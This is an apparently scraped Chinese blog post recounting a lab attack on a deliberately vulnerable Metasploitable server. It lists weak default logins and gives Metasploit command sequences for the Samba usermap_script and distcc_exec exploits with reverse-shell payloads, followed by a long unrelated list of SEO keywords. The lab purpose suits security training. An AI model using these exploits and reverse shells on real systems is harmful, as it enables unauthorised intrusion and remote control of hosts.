Samba&distcc 漏洞
发表于:2024-11-17 作者:千家信息网编辑
千家信息网最后更新 2024年11月17日,漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。使用metasploit对metasploitable 靶服务器进行***metas
千家信息网最后更新 2024年11月17日Samba&distcc 漏洞
漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。
使用metasploit
对metasploitable 靶服务器进行***
metasploitable 是ubuntu8.0的版本
neuss扫描到漏洞
139端口可以获取该系统主机名为"METASPLOITABLE",注释"metasploitable server (Samba 3.0.20-Debian)";
系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;
telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令
一个distcc漏洞
一个samba 共享服务漏洞
msf对靶服务器的工具
smb-samba 共享服务
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost (ip address)
set lhost (ip address)
exploit
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost (ip address)
set lhost (ip address)
exploit
distcc 成功 但是没有root的权限
用户
服务
漏洞
口令
系统
成功
服务器
权限
版本
开放
测试
直观
主机
信息
共享资源
命令
图片
密码
工具
数据
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
风电场网络安全建设方案
网络服务器usb接口
网络安全项目渠道
mysql数据库修改记录
阿贝云服务器是免费的吗
诊所管理软件开发
数据库技术实验二实验报告
一个数据库读写分离
拓展网络安全宣传
个股分析数据库
证券软件开发公司前十名
球球英雄经常与服务器断开连接
空间服务器没有文件管理
win服务器远程登录管理
天正电气导线截面数据库
兰州软件开发十强
南昌航空大学数据库
居家办公怎么连接公司服务器
网络安全专业开设的大学
网络安全运维职业等级考试
防诈骗属于网络安全吗
瑞丽有手机软件开发商吗
现在大家常用的软件开发模型
网络安全宣传微视频
搜狗网络技术
软件开发demo设计工具
台州市ctf网络安全竞赛
wind数据库如何下载
社区三维数据库简报
数据库恢复技术主要是